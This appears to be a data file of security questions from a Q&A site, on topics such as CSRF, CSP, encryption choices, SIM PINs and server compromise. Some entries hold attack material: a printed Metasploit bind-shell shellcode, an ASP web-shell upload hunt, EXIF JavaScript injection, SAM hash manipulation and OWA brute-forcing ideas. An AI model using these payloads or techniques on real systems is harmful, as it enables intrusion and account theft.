instruction stringlengths 24 29.9k |
|---|
I am a University student and I'm currently working on a paper of ethical hacking.
I have already investigated a lot about Web based attacks(SQLI, XSS, etc.) and about two months ago I started learning more about RE (Reverse Engineering) in Immunitydebugger.
My professor (who is a CCNP and is an instructor of CCNA) was telling me that I should look if it is possible to break into a Cisco or Juniper operating system but I have no idea where to start.
I already found the links below but the securitytube video is quite old and I don't think it will still work. The last video (NSA) was intriguing me most but they do not describe this technically.
Here are the links to the two videos I described above:
http://www.securitytube.net/video/266
http://gigaom.com/2013/12/29/nsas-backdoor-catalog-exposed-targets-include-juniper-cisco-samsung-and-huawei/
Does anyone know of a knowledge base or information related to breaking into a Cisco or Juniper router that would be beneficial for me?
|
I was pondering my computer theory and this question has been bugging me for a while .
Is it possible in some way to have a running process with its memory "encrypted" on an insecure system ?
If some one started a thread and its bits where encrypted with a key would`t it have to have its key visible in ram any way ?
I use a lot of remote virtual boxes and want to know if they can even be secure platforms . I can`t think of anything though that would stop the host from peering into the ram .
|
What I know about CSRF is that a malicious website tricks a normal user into issuing a request to a trusted website using a form.
I understand that is possible because we can post forms to different domains. However, I see posts of Stackoverflow that say that one should also protect AJAX requests using a token.
Doesn't the Same-origin policy force an AJAX request to be issued only to the domain that the script was loaded from?
I have heard of Cross-origin resource sharing, but if my understanding is correct it needs the web server to enable it, so a normal server shouldn't allow such request.
|
I know theoretical that blowfish is much faster than aes. But I benchmarked several algorithms including aes and blowfish for 1MB, 5MB, 10MB etc. files in java 8 platform and bouncy castle library. In every test scenarios aes is faster than blowfish.
I wonder if I make mistake somwhere?
Here is the code :
private static final int WARMUP_COUNT = 5;
private static final int FILE_LENGTH = 1024*512;
private static final int ITERATOR_COUNT = 1000;
private static final double BOLME = 1_000_000.0 * (ITERATOR_COUNT-WARMUP_COUNT);
static final private byte[] ivBytes = new byte[] { 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
private static final IvParameterSpec ivSpec16bytes = new IvParameterSpec(ivBytes);
private static final IvParameterSpec ivSpec8bytes = new IvParameterSpec(Arrays.copyOfRange(ivBytes,0,8));
static String[] algosWithMode = {"AES/CBC/PKCS7Padding","Blowfish/CBC/PKCS7Padding","CAST5/CBC/PKCS7Padding","DES/CBC/PKCS7Padding","DESede/CBC/PKCS7Padding", "IDEA/CBC/PKCS7Padding","ARC4", };
static String[] algos = { "AES","Blowfish","CAST5","DES", "DESede","IDEA","ARC4" };
static int[] keylenngth = {128,128,128,56, 168,128,128 };
@SuppressWarnings("unused")
public static void main(String[] args) throws Exception {
if(ITERATOR_COUNT <= WARMUP_COUNT )
throw new Exception("iterator count must be greater than warm up count iterator: "+ITERATOR_COUNT
+" warmup count :" + WARMUP_COUNT);
Security.addProvider(new BouncyCastleProvider());
Key key = null;
byte[] plainText=null;
byte[] cipherText=null;
byte[] decryptedText=null;
long startTime;
DecimalFormat df = new DecimalFormat("0.000");
for (int k = 0; k < 7; k++) {
long timeDec = 0,timeEnc = 0,timekey = 0;
long maxtimeDec = 0,maxtimeEnc = 0,maxtimekey = 0;
long mintimeDec = Long.MAX_VALUE,mintimeEnc = Long.MAX_VALUE,mintimekey = Long.MAX_VALUE;
long topDec = 0,topEnc = 0,topkey = 0;
for (int i = 0; i < ITERATOR_COUNT; i++) {
SecureRandom random= new SecureRandom();
plainText = random.generateSeed(FILE_LENGTH);
startTime=System.nanoTime();
KeyGenerator keyGen = KeyGenerator.getInstance(algos[k]);
keyGen.init(keylenngth[k],random);
key=keyGen.generateKey();
timekey=System.nanoTime()-startTime;
Cipher cipher=null;
if(k == 0){
cipher = Cipher.getInstance(algosWithMode[k]);
cipher.init(Cipher.ENCRYPT_MODE, key,ivSpec16bytes);
}else if(k == 6){
cipher = Cipher.getInstance(algosWithMode[k]);
cipher.init(Cipher.ENCRYPT_MODE, key);
}else{
cipher = Cipher.getInstance(algosWithMode[k]);
cipher.init(Cipher.ENCRYPT_MODE, key,ivSpec8bytes);
}
startTime=System.nanoTime();
cipherText = cipher.doFinal(plainText);
timeEnc=System.nanoTime()-startTime;
if(k == 0){
cipher = Cipher.getInstance(algosWithMode[k]);
cipher.init(Cipher.DECRYPT_MODE, key,ivSpec16bytes);
}else if(k== 6){
cipher = Cipher.getInstance(algosWithMode[k]);
cipher.init(Cipher.DECRYPT_MODE, key);
}else {
cipher = Cipher.getInstance(algosWithMode[k]);
cipher.init(Cipher.DECRYPT_MODE, key,ivSpec8bytes);
}
startTime=System.nanoTime();
cipher.doFinal(cipherText);
timeDec=System.nanoTime()-startTime;
if (i >= WARMUP_COUNT) {
if (maxtimeEnc < timeEnc)
maxtimeEnc = timeEnc;
if (maxtimeDec < timeDec)
maxtimeDec = timeDec;
if (maxtimekey < timekey)
maxtimekey = timekey;
if (mintimeEnc > timeEnc)
mintimeEnc = timeEnc;
if (mintimeDec > timeDec)
mintimeDec = timeDec;
if (mintimekey > timekey)
mintimekey = timekey;
topEnc += timeEnc;
topDec += timeDec;
topkey += timekey;
}
}
double avgEnc=topEnc/BOLME;
double avgDec=topDec/BOLME;
double avgKey=topkey/BOLME;
System.out.println("********************************************************"+algos[k]+"*****************************************************************");
System.out.println("Avg Enc :"+df.format(avgEnc)+" - "+" Avg Dec :"+df.format(avgDec)+"-"+" Avg Key :"+ df.format(avgKey));
System.out.println("Max Enc :"+df.format(maxtimeEnc/1_000_000.0)+" - "+" Max Dec :"+df.format(maxtimeDec/1_000_000.0)+"-"+" Max Key :"+ df.format(maxtimekey/1_000_000.0));
System.out.println("Min Enc :"+df.format(mintimeEnc/1_000_000.0)+" - "+" Min Dec :"+df.format(mintimeDec/1_000_000.0)+"-"+" Min Key :"+ df.format(mintimekey/1_000_000.0));
System.out.println();
//System.out.println();
}
}
|
When deploying a mobile phone best practices policy, one of the points which were raised was the requirement for the user to protect his SIM card with a PIN. The theory is that three failed attempts to input the right PIN switches the SIM card into PUK mode, and 10 failed attempts to input the PUK make the card unusable.
What is the reality of this assumption? One of the uses of a stolen mobile phone is to robot-call specific numbers and drain the user account:
is it practically possible* to crack the PIN code, either directly or by cloning the SIM and testing the 10,000 possible codes?
is it practically possible* to crack the PUK code? This one is longer but since it can be recovered by the carrier it means that a SIM ID can be used to generate such a code.
*) "practically possible" means doing it quickly enough to use the SIM before it is blocked (say, an hour)
I am interested in the technical aspects of the question (there are legal as well, when it comes to a policy ; there is also the possibility of fraud with the help of a carrier operator who would generate a PUK)
|
I'm able to upload any file to an ASP webapp/IIS server. My first though is to upload an ASP shell but I don't know where the file has been uploaded.
I have written a Python script that beggining with the URLs dumped by ZAP, makes requests to any known folder looking for my ASP file. For example, if I have the following URLs /dashboard and /images and my shell is called myshell.asp my script requests for:
/dashboard/myshell.asp
/dashboard/files/myshell.asp
/dashboard/downloads/myshell.asp
/images/myshall.asp
/images/files/myshall.asp
/images/downloads/myshell.asp
But I was unable to find the file.
I know that there exist certain special files that if present in a subdirectory have special meaning like: .htdocs. But if I don't know the path I don't know how to exploit this.
Is this scenario exploitable? How?
|
is there external library/approach/whatever to add
canary protection (stack-protector equivalent)
extra buffer boundary check (fortity source equivalent)
on a C software without using glibc / gcc built-in functionality ?
|
I plan on using OpenVPN on client devices which are small embedded machines, so I must balance between speed and security.
The OpenVPN documentation says that it is "general wisdom that 1024-bit keys are no longer sufficient". This refers to the asymetric keys used for the key exchange.
I should now choose an encryption method. My first thought is to take AES-128, but I'm not sure whether this is (in the "general wisdom" sense) still secure enough for the upcoming (10?) years.
Is there a consensus on this point?
In particular for OpenVPN: are other things more security relevant than the AES key size?
|
Suppose you have an Internet banking site based on a secure web server running the HTTPS protocol via port 443.
The server authenticates itself to clients through an X.509 certificate signed by a CA. The signature is constructed by using RSA encryption of the MD5 hash of the certificate content. The key used for the encryption is a 512-bit private key of the CA.
What is the most obvious weaknesses in such a "setup"? I thought the use of MD5 for integrity would be a weak point as MD5 has been broken. But since it's encrypted with RSA using a 512-bit private key, I guess the MD5 can't really be manipulated?
|
I need some pointers to any resources (videos from any conferences or general videos, pdf, anything) for secure source code reviewing of multi-tiered web-apps in JAX-WS, Spring or Hibernate. I am especially interested in know what are the security vulnerabilities that can occur when using these specific frameworks. I am currently reading the Chapters 17, 18 and 19 of the 2nd edition of Web Application's Hacker's Handbook. I think its good but I get a feeling that it just scratches the surface (or a kind of intro stuff). I'm not saying its not good, but I want to read more about it. Any links would be helpful.
Thanks!
|
While performing a pentest for a Java based application I came across an SQL (actually HQL) error by simply putting a single quote in one of the request parameters and breaking the syntax of the query. But as the application made use of Hibernate Query Language as an intermediate layer between the application and the database, I was unable to directly access the database.
HQL does not support Union or time delay based controls which we generally exploit as pentesters. I was only able to extract all the entries from the table in question. Note that as the injection was found in a simple search functionality there was no confidential data in the table. I was unable to extract any database or system related information.
I have already looked at this question. My question here is, can using an abstraction layer like this be suggested as a preventive measure during the development phase of an application? Because in my understanding it can really minimize the damage potential of an SQLi vulnerability (At least in my given case where there is no real critical data in the database)
Am I missing out on something important here?
|
In TrueCrypt I noticed the option to encrypt a volume with multiple encryption algorithms i.e. AES-Twofish-Serpent. Would it be useful to encrypt something with the same algorithm multiple times? For example AES-AES-AES. I would guess if a flaw or backdoor in the algorithm was discovered this defense would be useless, but would it make brute force attacks harder?
EDIT: how is applying multiple iterations any different?
|
Skip to the fifth paragraph for the actual question, before that is some background.
I am a highschool student with an interest in computers and penetration testing. Given the restrictions placed on student-level access on the computers at my school, I often attempt privilege escalation in order to gain more complete access to resources that I need (at times school-related, but restricted nonetheless). Although I do that type of stuff pretty often, I never really expect any major success.
A while ago I was taken aback to discover a local admin account without a password, but that did not provide access to anything I couldn't already access, with the exception of the C:\ drive and tools such as the Task Manager and Command Prompt. In other words: it was far from a big discovery for me.
More recently, I stumbled upon a Fuzzy Security post-exploitation/privilege escalation tutorial (here) which mentioned looking for sensitive data in config files left behind by automated desktop setup. I know from quite a bit of searching that the 513 computers on the schools network have been set up in this way. I was still surprised to find the network admin password in plaintext in C:\sysprep\unattend.xml.
Since finding it, I have further investigated what can be done. The things I have found range from accessing all student and teacher files (which, in some cases include exams and exam keys) to remotely connecting to the school server and the district server to add users as students, teachers, admins, and staff, and modify said users' netlogon files to cause them to run malicious programs when they log on. Much of this I have investigated but not tested for fear of being caught.
My question is whether or not I should tell the school tech staff before someone who would abuse it finds it, and if so, how to go about doing so in a way that wouldn't result in my punishment. My worry is that if I report it, evidence of my explorations of network admin capabilities will appear malicious to them. I want to do the right thing, but I would rather not get in trouble if that's what would happen as a result.
|
<?php
header("Content-Security-Policy: default-src 'sha256-".base64_encode(hash('sha256', 'console.log("Hello world");', true))."'");
?>
<script>console.log("Hello world");</script>
However I still receive in Chrome:
Refused to execute inline script because it violates the following
Content Security Policy directive: "default-src
'sha256-1DCfk1NYWuHM8DgTqlkOta97gzK+oBDDv4s7woGaPIY='". Either the
'unsafe-inline' keyword, a hash ('sha256-...'), or a nonce
('nonce-...') is required to enable inline execution. Note also that
'script-src' was not explicitly set, so 'default-src' is used as a
fallback.
I've toyed with this for over an hour but still am unable to generate a hash that matches examples eg.
http://software-security.sans.org/downloads/appsec-2014-files/building-a-content-security-policy-csp-eric-johnson.pdf
Claims <script>alert('Allowed to execute');</script> (hard to determine original spacing) has hash of sha256-MmM3YjgyNzI5MDc5NTA0ZTdiCWViZGExZDkxMDhlZWIw NDIwNzU2YWE5N2E4YWRjNWQ0ZmEyMDUyYjVkNjE0NTk=
Which doesn't make much sense: the last part doesn't start with sha256-, but at least the first hash is the correct length. I get sha256-nbFv/38jW7zf8mQirwFemFjDwp5CwIaorxe4Z3yycn0= as the hash for alert('Allowed to execute');
http://nmatatal.blogspot.com/2013/09/how-my-script-hash-poc-works.html
Claims:
<script>console.log("Hello world");</script> should have a csp of
script-src 'sha256-y/mJvKQC/3H1UwsYAtTR7Q==' eyeballing it, that looks too short.
What am I doing wrong?
|
Is it possible to use RSA public and private keys to authenticate two computers (or to make sure they're both the right computers)? If so, how?
Thanks!
|
I was at a coffee shop and had to (I mean had to) check something on my bank account and another account. I figured since the two websites I was viewing were encrypted, and because my computer (I'm on a Mac) has a firewall, and I don't share through a cloud or such, that my information is safe. Google is encrypted from the moment that you search, and I connected to the actual wifi of the coffee shop (I had to accept their terms in order to do so).
So I was using HTTPS the entire time. I contacted the bank tech support and they confirmed that their whole website is completely encrypted. Same with the other account. Was I safe? There was a person nearby who looked as if he was doing something suspicious on his computer as far as hacking/networking.
|
I've recently joined a security project, and received a task to demonstrate the risk related to an end-user uploading an image containing embedded (malicious) JavaScript code.
I used EXIFeditor to inject JavaScript code in an image's imgdescription tag, then uploaded the image to the ASP.NET web server using the following C# code:
protected void Upload_File(object sender, EventArgs e)
{
var postedFile = Upload_fu.PostedFile;
string fileName=new FileInfo(postedFile.FileName).Name;
string path = Server.MapPath("~/images/" + fileName);
postedFile.SaveAs(path);
Success_msg.Text = "successfully saved";
img_sr.ImageUrl = "~/images/" + fileName;
}
Note: img_sr is a <asp:Image/> element, and Upload_fu is a <asp:UploadFile/> element.
The JavaScript code I've embedded int the image is a simple alert("Hello world"). However, the code isn't executed (I tried this with FireFox 21 and Internet Explorer 9).
What am I doing wrong?
|
The private and the public key from the cert must have the same algorithm, correct?
Yes of course pub / priv are a key pair.
So this code would be legal, to be more flexible (e.g. ECDSA or DSA):
PrivateKey privkey = (PrivateKey) keystore.getKey(keyAlias, passphrase);
Certificate cert = keystore.getCertificate(keyAlias);
KeyFactory keyFactory = KeyFactory.getInstance(privkey.getAlgorithm()); //before: "RSA"
publicKey = keyFactory.generatePublic(keySpec1);`
|
Is anybody use publicly available (or relatively cheap) templates of procedures for ISO 27001 for build own information security management system capable to be conform standard.
Any recommendation?
After such organic building system did you certified it? Or crucial was reach comparable metrics and staff behavior, not official papers?
|
I was wondering if it is possible to create a windows SAM file. I already tried using chntpw but it seems like it only works under a Redhat based linux, ie I was able to blank/change a Windows 7 64bit box on Fedora with chntpw 0.99.5 but I couldn't get it done using Backtrack 5, Ubuntu or Kali. I know I can recover the password with tools like ophcrack or just using pwdump or sth like that to get the NTLM hashes and then decypt it using bruteforce or rainbow attacks, but I want to know if it is possible to just replace the hash in the SAM file (with physical access to the box using a live os), in another words I just want to know how chntpw works and how to do what it does manually.
any help is appreciated...
please note that my problem isn't replacing the password I know several ways to do that, as I said in the title I want to know if it is possible to generate a SAM file from NTLM hashes, I want to know how these NTLM hashes are stored in the SAM file. I don't want any tools, if anything I want a tool that does the reverse of what pwdump does , ie take the hashes and store it to the SAM file (with live cd of course).
|
There are many Firewall solutions for the world on different operating systems: iptables, pf, ipfw.
My question is: Does the firewalls run in kernel-space or all of them runs in user-space? (in general, not just the mentioned ones)
|
I installed the CAcert root certificates on my Android device (which is not rooted), so that I could visit websites with server CAcert certificates without getting the "certificate not trusted" warning.
But now I get constantly reminded by Android, at each reboot, that a third party is capable of monitoring my network activity.
How is it possible? Does it mean that even the "standard" trusted certs that come with Android are capable of such a thing too? How is it even possible?
|
Since an IP address does not necessarily represent a specific device, but probably a whole network/company/etc. does it at all make sense to block an IP address if there is a significant amount of false login tries from it?
I was planning to implement IP checking as well as tries for a specific user/account/email, but I am not sure if it is better to leave the IP check out completely therefore.
On the other hand this allows an attacker to pretty much try a specific amount of passwords for every user without ever getting banned (at the same time blocking those users from being able to log in since their accounts will be locked for a while).
What is the correct approach to prevent something like that (possibly without using dedicated hardware)?
|
As I understand it, GnuPG allows the creation of multiple subkeys, but multiple encryption subkeys are problematic because it's not clear which encryption subkey someone should use when sending a message. As such, by default, when a person sends a message to you, their software will select the most recent encryption subkey. This limits the utility of having multiple encryption subkeys on different devices, but not necessarily signing subkeys.
Now, imagine a situation where we have two laptops. Neither laptop contains the master key, but only a single subkey for signing (S) and subkey for encryption (E). Since we have trouble using multiple encryption subkeys, we have a setup like this:
Laptop 1: E, S1
Laptop 2: E, S2
Hence, each laptop has its own signing subkey, but they each share an encryption subkey. Now, say we lose laptop 1. At this point, using the master key, we can revoke the certificate for E and S1. Since the master key was safe, we preserve our WoT. However, since E is no longer valid, we still need to update laptop 2 with a new encryption subkey. Since we always need to update laptop 2 in the case that laptop 1 is compromised, why should we prefer the setup above to a key setup
Laptop 1: E, S
Laptop 2: E, S
Certainly, if we're only signing, having separate signing subkeys for each device makes sense. However, if we need to sign and encrypt, does it still make sense to have separate signing subkeys for each device?
Edit 1
Following up on @jens-erat's answer, I checked and GnuPG does allow us to specify exactly which subkey we use for encryption. Simply, append ! after the specified key. This forces GnuPG to use this particular key and not go through the normal calculation as to what key to use. This is in the man file under the section "HOW TO SPECIFY A USER ID" under subheading "By key Id." Then, as @jens-erat stated, we could add a bunch of notations to the key, which specify which key should be used for which situation or address. By looking at the notation block with --list-sigs and then specifying the exact key with !, we can utilize multiple encrypting subkeys. That being said, I don't think this is standard use and will likely cause use problems for people.
|
We are currently having accounts compromised at a substantially high rate. Some in the organization believe that our password complexity requirements is enough to thwart brute force attacks.
I wanted to test and demonstrate how certain password complexity requirements can actually reduce the password search space.
Has anyone done this before? What tools should I look into? I specifically would prefer to test it on our Exchange 2010 OWA web page since that is publicly accessible and not rate limited at the moment.
|
We seem to spend a lot of time guarding against Man-In-The-Middle (MITM) attacks without discussing who we are actually guarding against.
This is important because if these individuals are unlikely to attack our website or the cost of them doing so is minimal then we can afford to spend less resources guarding against such attacks. For example: https://security.stackexchange.com/a/58729/5002
My understanding is that there are only two ways to intercept internet packets:
Tap into the physical layer (i.e. the phone/cable lines outside my house or WiFi connection).
Tap into ISP infrastructure (the hops between my computer and the destination website).
There are only 3 kinds of people who can carry out these taps:
Anyone with technical knowledge to tap into the physical layer, or hack an ISP.
Anyone with legal power to compel ISPs to intercept the packets.
This leads to three kinds of attackers:
Rogue individuals.
Corporate spies.
The government.
The point I'm trying to make is that if your website is not financially or politically significant (i.e. Stackoverflow) then it is unlikely that MITM attacks are all that relevant. The most an attacker can do is vandalize the site, the probability that anyone would want to do so is low, and the cost of recovery is relatively low. Your average script kiddie might have the motivation, but lacks the technical ability to do so.
Am I missing anything? :)
|
I'm having trouble with a spammer and would like to begin submitting their messages to a few black hole lists.
Unfortunately, I'm having trouble finding a list. For example mail-abuse.org now redirects to Trend Micros and there's nothing of substance available (just a dashboard showing SPAM densities per country).
Are there any black hole lists remaining that accept submissions? What is state of the art in protection from targeted email?
|
I've heard from several people that private repository servers like BitBucket are not really safe. I've heard rumours about code being stolen and used by people even out of private repositories.
Is it true? Is there any evidence, that cases like that could have happened?
|
I have a use case forced upon me by industry regulation. I wish it wasn't there, but it is.
A user logs in to my service, navigates around, etc. The user can perform many actions, but one of the actions requires (by industry regulation) that the user re-enter the username and password prior to continuing. It does not matter if the user logged in 5 seconds beforehand. In order to complete this action the user must re-enter the username and password.
We are looking to integrate with another company, using SAML to power SSO and Federated IDs. Is there a way for us to tell the IdP to re-authenticate the user, even if the user is already authenticated?
Thanks
Alan
|
Is there an easy way to test an SMTP server to check for configuration issues associated with STARTTLS encryption, and report on whether it has been configured properly so that email will be encrypted using STARTTLS?
Think of the Qualys SSL server tester as an analogy: it is a great tool to quickly check a webserver to see use of SSL has been properly configured, and identify opportunities for improving the configuration to provide stronger encryption. It knows how to recognize many common configuration errors and gives a grade. Is there anything like that for STARTTLS on SMTP servers?
In particular, given a SMTP server, I would like to tell:
whether it supports STARTTLS,
whether its STARTTLS configuration has been set up properly so that email with other major email providers will end up being encrypted,
whether it supports perfect forward secrecy and whether it is configured so that the perfect forward secrecy ciphersuites will be used in practice (where possible),
whether it provides a suitable certificate that will pass strict validation checks,
whether it has any other configuration errors.
How can I do this?
Facebook and Google have recently highlighted the state of STARTTLS usage on the Internet and called for server operators to enable STARTTLS and configure it appropriately so that email will be encrypted while in transit. Are there easy-to-use tools to support this goal?
|
I am trying to figure out how it was compromised. They installed IptabLes and IptabLex in /boot.
They also added /etc/init.d/IptabLes and /etc/init.d/IptabLex which simply call the respective /boot files. It seems this attack uses a lot of bandwidth (probably a DDoS); I noticed it immediately.
The server is running CentOS 6.5 with all the latest updates.
It runs logstash, redis, ElasticSearch, and Cherokee webserver serving Kibana.
I am thinking it must either be ElasticSearch or Cherokee web-server.
ElasticSearch port (9200) was open to the world, because Kibana requires it to view the nice graphs. Redis ports (6379) were restricted to only 5 known hosts via iptables.
Cherokee webserver runs on port (8080) not default of 80 and was open to the world.
SSH does not seem to be compromised. The server uses keys and no password authentication
is allowed. We run SSH on port 2020, which is listed as (xinupageserver) in iptables.
Here are the iptables rules. Notice redis is restricted to web hosts,
but http via Cherokee (webcache) and ElasticSearch (wap-wsp) are open.
➜ ~ iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
ACCEPT all -- anywhere anywhere
REJECT all -- anywhere loopback/8 reject-with icmp-port-unreachable
ACCEPT all -- anywhere anywhere state RELATED,ESTABLISHED
ACCEPT tcp -- anywhere anywhere state NEW tcp dpt:xinupageserver
ACCEPT tcp -- web1.mydomain.com anywhere tcp dpt:6379
ACCEPT tcp -- web2.mydomain.com anywhere tcp dpt:6379
ACCEPT tcp -- web3.mydomain.com anywhere tcp dpt:6379
ACCEPT tcp -- web4.mydomain.com anywhere tcp dpt:6379
ACCEPT tcp -- web5.mydomain.com anywhere tcp dpt:6379
ACCEPT tcp -- anywhere anywhere tcp dpt:wap-wsp
ACCEPT tcp -- anywhere anywhere tcp dpt:webcache
ACCEPT icmp -- anywhere anywhere icmp echo-request
REJECT all -- anywhere anywhere reject-with icmp-port-unreachable
Chain FORWARD (policy ACCEPT)
target prot opt source destination
REJECT all -- anywhere anywhere reject-with icmp-port-unreachable
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
ACCEPT all -- anywhere anywhere
Thanks so much for the help.
|
I'm going though my GPG keychain. I've got a key for a few strangers in my keychain. I don't recall exchanging keys and I'm not sure how the public keys came to be installed in the keychain. I think (perhaps incorrectly) it may have been installed by GPG for Mac OS X, but I'm not certain.
I did find some references to him relating to Firefox, but I do not use a GPG/Firefox plugin, so the browser and the keychain should be disjoint.
What reasons could this have?
|
I am seeing quite a few browser "version 0.0" in visitor log. Can anyone explain the significance of this? Please see examples below. Thanks.
Safari version 0.0 running on ChromeOS
Chrome version 0.0 running on Win8.1
Chrome version 0.0 running on Win7
Chrome version 0.0 running on WinXP
Google Web Preview version 0.0
AppEngine-Google version 0.0
Google Feedfetcher version 0.0
BingPreview version 0.0
WinHttp version 0.0
|
NIST recommends FIPS 181 as a random password generator for "easy to remember" passwords.
As far as I understand the standard:
it will generate a password that is lowercase, and with some pronouncebale syllabuls
My question is whether there is an alternative standard which:
includes besides lowercase alphabet, uppercase alphabet as well as numerics
not necessary easy to remember
If there is no standard for such a password generator, should simply change the seed for FIPS 181, or is there a better alternative?
|
At our office we have bad reception for 3G. We bought a Femtocell device that provides a 3G connection for one specific mobile provider. This device is connected to our network via ethernet. I cannot use this device at our office, because I use another provider.
Thinking about this - it could be that I use connections like this without knowing it. Take imaginary John, living in an area where connection is bad. He has bought and installed his own Femtocell at home. Not only he connects to this device, but everybody in range of this device - not?
When my direct connection to my provider fails, and I'm in range of John's home femtocell, my SMS, phone conversations and internet data are transferred over his home network.
Is this traffic encrypted and safe?
Is it true that anybody can connect to this device and use bandwidth?
When a phone connects to this femtocell, does it have access to the local LAN?
|
So I just used metasploit to generate the payload/linux/x86/shell_bind_tcp payload without null bytes (generate -t raw -b '\x00' -f shellcode). Here's the shellcode:
$ xxd -p shellcode
dbddd97424f45e33c9bf0e0f5844b114317e1983c604037e15ecfa699f07
e7d95cb482dfebdbe386269b5f19ebf35da51a5f08b54d0f455407c90d5a
589cef60ea9a5f0ec122dc7fbfef63ec19855c4b57d9ea129fb1c3cb2c29
743bb1c0eacad642a045f9d24d9b7a
And here's what objdump thinks the shellcode is:
$ objdump -D -b binary -m i386 shellcode
shellcode: file format binary
Disassembly of section .data:
00000000 <.data>:
0: db dd fcmovnu st,st(5)
2: d9 74 24 f4 fnstenv [esp-0xc]
6: 5e pop esi
7: 33 c9 xor ecx,ecx
9: bf 0e 0f 58 44 mov edi,0x44580f0e
e: b1 14 mov cl,0x14
10: 31 7e 19 xor DWORD PTR [esi+0x19],edi
13: 83 c6 04 add esi,0x4
16: 03 7e 15 add edi,DWORD PTR [esi+0x15]
19: ec in al,dx
1a: fa cli
1b: 69 9f 07 e7 d9 5c b4 imul ebx,DWORD PTR [edi+0x5cd9e707],0xebdf82b4
22: 82 df eb
25: db e3 fninit
27: 86 26 xchg BYTE PTR [esi],ah
29: 9b fwait
2a: 5f pop edi
2b: 19 eb sbb ebx,ebp
2d: f3 5d repz pop ebp
2f: a5 movs DWORD PTR es:[edi],DWORD PTR ds:[esi]
30: 1a 5f 08 sbb bl,BYTE PTR [edi+0x8]
33: b5 4d mov ch,0x4d
35: 0f 45 54 07 c9 cmovne edx,DWORD PTR [edi+eax*1-0x37]
3a: 0d 5a 58 9c ef or eax,0xef9c585a
3f: 60 pusha
40: ea 9a 5f 0e c1 22 dc jmp 0xdc22:0xc10e5f9a
47: 7f bf jg 0x8
49: ef out dx,eax
4a: 63 ec arpl sp,bp
4c: 19 85 5c 4b 57 d9 sbb DWORD PTR [ebp-0x26a8b4a4],eax
52: ea 12 9f b1 c3 cb 2c jmp 0x2ccb:0xc3b19f12
59: 29 74 3b b1 sub DWORD PTR [ebx+edi*1-0x4f],esi
5d: c0 ea ca shr dl,0xca
60: d6 (bad)
61: 42 inc edx
62: a0 45 f9 d2 4d mov al,ds:0x4dd2f945
67: 9b fwait
68: 7a .byte 0x7a
This link also gives a similar disassembly: http://www.onlinedisassembler.com/odaweb/x1SSxJ/0
I might be wrong, but this shellcode seems strange. First of all, it doesn't work, but that's not enough to show that it's wrong. The second issue is that objdump says (bad) near the bottom, which probably means the assembly is wrong. The final thing is that I have no clue what it's doing after reading the assembly. Generating the shellcode for this same payload with null bytes gives correct, readable assembly. I don't think removing null bytes can add this much complexity to the shellcode.
Did I do something wrong? If not, can someone explain how the shellcode works?
|
I have my own suspicions that there are blocked users of my website that use Teamviewer to login to my site from their friends' pc. Is there any way to identify if the one who visit a website is using the Teamviewer at the same time?
|
If I go to https://google.com/q=test_query with from my browser, what traffic can be seen on the router?
Can the domain name (google.com) be seen?
If so, can I block all of the traffic to a web page by disallowing access to that domain? Does anything change if the website has multiple IPs (different servers)?
Thanks!
|
In other words, how easy is it to break into Windows without having the passwords for any of the users configured in the computer?
|
I am trying to encrypt few database columns (string values) using Java AES algorithm. This is to protect certain sensitive data. For some users these data should decrypted.
In Java AES encryption, if my input character length is 60, I am getting encrypted string length as 88.
But I don't want a change the length of the encrypted data. We have huge amount to tables and many applications are using those tables. We want to minimize the impact of encrypting certain fields in the tables.
Is there is any recommended solution? OR is there is any recommended algorithm, code sample, etc?
Thanks, Prabakaran N
|
As stated in the title.
In my lab I am trying to arpspoof a so called "victim pc" that is using Windows 7.
I do arp spoofing with arpspoof, but once run arp -a on the victim I see that the gateway entry is not changed. Maybe because the entry associated with the gateway is set to static.
In a situation like this, there is no way to arpspoof the victim?
|
A recent laptop theft, as well as concern that the data upon it might be deliberately accessed (on a drive with encryption or not), head lead me to think about how one might retroactively seek to regain possession of such a laptop, or at least how one might go about gaining leads as to who might have taken it - or where it might be.
If the stolen device were to include a unique file - lets call it Project_X.doc - and this same file were on another device available to the aggrieved, then might it be possible to track down the location of the device through location of the mentioned file?
I am not sure how this might work.
One obvious way would be a trap file that might appeal to a would-be invader that proceeds to send information to a secure email recipient, revealing its location. Kind of virus-like. The only problem with this (besides assumption that it'll be juicy enough bait to bite) is that it involves a degree of foresight and is not a measure that can be applied retrospectively.
The same would apply to registering the device itself with an online site permitting for its tracking. Not retroactive.
Could there simply be two identical files - on for use as a 'fingerprint' file, and another within the stolen device - that could be used to track the location without foresight other than 'happening to have the same file' on another device?
It would also be appreciated if at least a brief 'why yes' or 'why not' could also be included. I am no security pro by many a yard :)
|
Using a buffer overflow, I have been able to override return addresses. But the problem is that Windows addresses contain zeros at the beginning (e.g. 0x00401020). As a result, the objdump of any C binary will contain zero's. This makes it very difficult to execute shellcode inside a buffer as a shellcode cannot contain zero's for it to work.
Has anyone done this sort of thing? It does not matter even if the exploit is printing hello-world: is it possible?
|
I got a question that says "What is the major difference in the USB propagation system used by Flame with regard to Stuxnet to prevent being identified?".
After Googling for a while, I haven't found anything about this.
|
We have a situation where a user's identity can be verified as follows: the network provider knows the identity of the user and injects secure headers into the HTTP request, which our servers can use to authenticate the user.
We're writing client-server applications and want to use this mechanism to automatically authenticate the user. We can't use HTTPS end-to-end for the authentication request because obviously the network couldn't inject headers in that case.
EDIT: roughly equivalent setup:
(client <-VPN-> HTTP proxy) <-internet-> our server
Assume the VPN (bold section) is secure and the user is authenticated within in the VPN.
The client generates a HTTP request. A proxy within the network knows the client's identity and generates a token which is automatically added to the headers in the proxied HTTP request. All of this happens in a secure domain and cannot therefore be compromised. (Unfortunately we can't change anything in the VPN setup, such as have the proxy make a HTTPS request instead.)
Our server can query back to the network (securely) to determine the identity of the client who initiated the request.
Assumptions:
This HTTP requirement is a given and can't be changed.
An attacker can't fool the identity verification process by presenting fake headers.
An attacker might be able to otherwise intercept/compromise the HTTP request/response.
Server is stateless (so no storing one-time keys server-side).
Storing a private key in the client application is not an option as it could be compromised
The HTTP request/response will be used auto-authenticate the user, but all other interactions before (if necessary) and afterward will be over HTTPS.
Here's what we've tried so far:
Client fetches a public key PK from server over HTTPS
Client generates a symmetric key SK
Client encrypts SK using PK, and sends this to server over HTTP
Server verifies user's identity and generates authentication token AT
Server encrypts AT using SK -> E(AT,SK)
Server signs E(AT,SK) using its private key and sends to client
Client uses PK to verify signature
Client uses SK to decrypt E(AT,SK) giving AT
